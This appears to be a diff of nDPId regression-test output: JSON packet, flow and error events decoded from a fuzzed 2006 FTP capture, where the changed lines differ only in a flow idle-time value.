00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":46,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"thread_ts_msec":1120469634878,"pkt":"ADBUADRWAODtAW69CABFAAAoaa1eAIAGOZHAqAECk+oB\/QqgABWvncMQ5R+VBVAQQiQelgAA"} -00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1120469634993,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1120469634993,"pkt":"AODtAW4UADBUADRWCABFEABeeQBAADkGcPiT6gH9wKgBAgAVCqDlH5UFr53DEFAYYzaF6QAAMjIwIFByb0ZUUEQgU2VydmVyIEluIEVDSSBUZWxlY29tIChudHAsZWNpdGVsZS5jQ20pIA0K"} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1120469634993,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1120469634993,"pkt":"ADBUADRWAODtAW69CABFAAA4aa5AAIAGOYDAqAECk+oB\/QqgABWvncNQ5R+VO1AYQe6WoQAAnlNFUiBhbm9ueW1vdXMNCg=="} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635010,"flow_last_seen":1120469635010,"flow_idle_time":7440000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":1,"thread_ts_msec":1120469635010,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.169.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1120469635010,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1120469635010,"pkt":"AOBzAW69ADBUADRWCABFEAB0eQJAADkGcOCT6gH9wKkBAgAVCqDlH5U7r53DIFAYYzZecwAAMzMxIEFub255bW91cyBsb2dpbiBvaywgc2VuZCB5b3VyIGNvbXBsZXRlIGVtYWlsIGFkZHJlc3Mg4XMgeW91ciBwYXNzd29yZC4NCg=="} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635012,"flow_last_seen":1120469635012,"flow_idle_time":7440000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1120469635012,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2679,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1120469635012,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1120469635012,"pkt":"ADBUACRWAODtAW69CABFAAA0aa9AAIAGOYPAqAECk+oB\/Qp3ABWvncMg5R+Vb1AYQaK71QAAUEFTUyBkMHhhIQ0K"} 
+00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1120469634993,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1120469634993,"pkt":"AODtAW4UADBUADRWCABFEABeeQBAADkGcPiT6gH9wKgBAgAVCqDlH5UFr53DEFAYYzaF6QAAMjIwIFByb0ZUUEQgU2VydmVyIEluIEVDSSBUZWxlY29tIChudHAsZWNpdGVsZS5jQ20pIA0K"} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1120469634993,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1120469634993,"pkt":"ADBUADRWAODtAW69CABFAAA4aa5AAIAGOYDAqAECk+oB\/QqgABWvncNQ5R+VO1AYQe6WoQAAnlNFUiBhbm9ueW1vdXMNCg=="} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635010,"flow_last_seen":1120469635010,"flow_idle_time":7560000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":1,"thread_ts_msec":1120469635010,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.169.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1120469635010,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1120469635010,"pkt":"AOBzAW69ADBUADRWCABFEAB0eQJAADkGcOCT6gH9wKkBAgAVCqDlH5U7r53DIFAYYzZecwAAMzMxIEFub255bW91cyBsb2dpbiBvaywgc2VuZCB5b3VyIGNvbXBsZXRlIGVtYWlsIGFkZHJlc3Mg4XMgeW91ciBwYXNzd29yZC4NCg=="} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635012,"flow_last_seen":1120469635012,"flow_idle_time":7560000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1120469635012,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2679,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1120469635012,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1120469635012,"pkt":"ADBUACRWAODtAW69CABFAAA0aa9AAIAGOYPAqAECk+oB\/Qp3ABWvncMg5R+Vb1AYQaK71QAAUEFTUyBkMHhhIQ0K"} 00195{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":55,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120469635042} 
00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":55,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"thread_ts_msec":1120469635042,"pkt":"ADBUADRWAODtAW69CAAGAAAoabBAAIAGOY7AqAECk+oB\/QqgABWvncMs5R+VqVAQQYAeegAA"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635042,"flow_last_seen":1120469635042,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120469635042,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.2.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1120469635042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":23,"thread_ts_msec":1120469635042,"pkt":"AODtAW69ADBUBDRWCABFEAAreQZAADkGcSWT6gH9wAIBAgAVCqDlH5Wpr53DLFAYYzbSqwAAIA0KAAAA"} 
-00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635043,"flow_last_seen":1120469635043,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1120469635043,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.66","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1120469635043,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1120469635043,"pkt":"AODtAW69ADBUADRWCABFEABDeQdAADkGcQyT6gH9wKgBQgAVCqDlH5Wsr53DLFAYYzYWCgAAIC9wdWIJCS0+IFB1YmxpYyBGb2xkZXIuIA0K"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635042,"flow_last_seen":1120469635042,"flow_idle_time":7560000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120469635042,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.2.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1120469635042,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":23,"thread_ts_msec":1120469635042,"pkt":"AODtAW69ADBUBDRWCABFEAAreQZAADkGcSWT6gH9wAIBAgAVCqDlH5Wpr53DLFAYYzbSqwAAIA0KAAAA"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635043,"flow_last_seen":1120469635043,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1120469635043,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.66","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1120469635043,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1120469635043,"pkt":"AODtAW69ADBUADRWCABFEABDeQdAADkGcQyT6gH9wKgBQgAVCqDlH5Wsr53DLFAYYzYWCgAAIC9wdWIJCS0+IFB1YmxpYyBGb2xkZXIuIA0K"} 00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":62,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":53,"global_ts_msec":1120469635044} 
00398{"packet_event_id":1,"packet_event_name":"packet","packet_id":62,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":87,"pkt_l4_len":0,"thread_ts_msec":1120469635044,"pkt":"AODtAW69ADBUADRWCABFJXMAeQpAADkGcQOT6gH9wKgBAgB4CqDlH5YGr53DLFAYY3bTEAAAIC9pbmNvbWluZwktJXMAbmNvbWluZyBGb2xkZXIuIA0K"} -00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635045,"flow_last_seen":1120469635045,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1120469635045,"l3_proto":"ip4","src_ip":"147.234.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1120469635045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1120469635045,"pkt":"AODtAW69ADBUADRWCABFEABjeQtAADkGcOiT6gGqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 
+00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635045,"flow_last_seen":1120469635045,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1120469635045,"l3_proto":"ip4","src_ip":"147.234.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1120469635045,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1120469635045,"pkt":"AODtAW69ADBUADRWCABFEABjeQtAADkGcOiT6gGqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":65,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":53,"global_ts_msec":1120469635045} 00398{"packet_event_id":1,"packet_event_name":"packet","packet_id":65,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":87,"pkt_l4_len":0,"thread_ts_msec":1120469635045,"pkt":"AODtAW69ADBUJXMACABFEBBJeQxAADkGcQGT6gH5wKgBAggVCqDlH5Zir53DLFAYYzaAtgAAIC9vdXRnb2luZwktPiBvdXRnb2luZyBGb2xkZXIuIA0K"} 
-00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635046,"flow_last_seen":1120469635046,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120469635046,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2208,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1120469635046,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":23,"thread_ts_msec":1120469635046,"pkt":"AKrtAW69ADBUADRWCABFEAAreQ5AADkGcR2T6gH9wKgBAgAVCKDlH5a+r53DLFgYYzbRlgAAIFUKAAAA"} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635048,"flow_last_seen":1120469635048,"flow_idle_time":7440000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":1,"thread_ts_msec":1120469635048,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2732,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1120469635048,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1120469635048,"pkt":"AODtAW69ADBUADRWCABFEABjeQ9AADkGcOST6gH9wKgBAgAVCqzlH5bBr53DLFAYYzY9pwAAIEZpbGVzIGxhcmdlciB0aGVuIDI1ME1CIHdpbGwgYmUgZGVsZXRlZCBhZnRlciA1IGRheXMgISEhDQo="} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635049,"flow_last_seen":1120469635049,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120469635049,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":1045,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1120469635049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":23,"thread_ts_msec":1120469635049,"pkt":"AODtAW69ADBUADRWCABFEAAreRJAADkGcRmT6gH9wKgBAgQVCqDlH5cvr53DLFAYYzbRJQAAIA0KAAAA"} 
-00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635052,"flow_last_seen":1120469635052,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1120469635052,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.65.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1120469635052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1120469635052,"pkt":"AODtAW69ADBUADRWCABFEABReRRAADkGcPGT6gH9wKhBAgAVCqDlH5dFr53DLFAYYzYwqgAAMjMwIEd1ZXN0IGFjY2VzcyBncmFudGVkIGZvciBhbm9ueW1vdSVzAAo="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635046,"flow_last_seen":1120469635046,"flow_idle_time":7560000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120469635046,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2208,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1120469635046,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":23,"thread_ts_msec":1120469635046,"pkt":"AKrtAW69ADBUADRWCABFEAAreQ5AADkGcR2T6gH9wKgBAgAVCKDlH5a+r53DLFgYYzbRlgAAIFUKAAAA"} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635048,"flow_last_seen":1120469635048,"flow_idle_time":7560000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":1,"thread_ts_msec":1120469635048,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2732,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1120469635048,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1120469635048,"pkt":"AODtAW69ADBUADRWCABFEABjeQ9AADkGcOST6gH9wKgBAgAVCqzlH5bBr53DLFAYYzY9pwAAIEZpbGVzIGxhcmdlciB0aGVuIDI1ME1CIHdpbGwgYmUgZGVsZXRlZCBhZnRlciA1IGRheXMgISEhDQo="} 
+00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635049,"flow_last_seen":1120469635049,"flow_idle_time":7560000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120469635049,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":1045,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1120469635049,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":23,"thread_ts_msec":1120469635049,"pkt":"AODtAW69ADBUADRWCABFEAAreRJAADkGcRmT6gH9wKgBAgQVCqDlH5cvr53DLFAYYzbRJQAAIA0KAAAA"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635052,"flow_last_seen":1120469635052,"flow_idle_time":7560000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1120469635052,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.65.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1120469635052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1120469635052,"pkt":"AODtAW69ADBUADRWCABFEABReRRAADkGcPGT6gH9wKhBAgAVCqDlH5dFr53DLFAYYzYwqgAAMjMwIEd1ZXN0IGFjY2VzcyBncmFudGVkIGZvciBhbm9ueW1vdSVzAAo="} 00195{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":78,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120469635053} 00367{"packet_event_id":1,"packet_event_name":"packet","packet_id":78,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":62,"pkt_l4_len":0,"thread_ts_msec":1120469635052,"pkt":"ADBUADRWAODtAW69CADFAAAwabhAAIAGOX7AqAECk+oB\/QqgABWvncMs5R+XblAYP7tMeAAAVFlQRSBJDQo="} 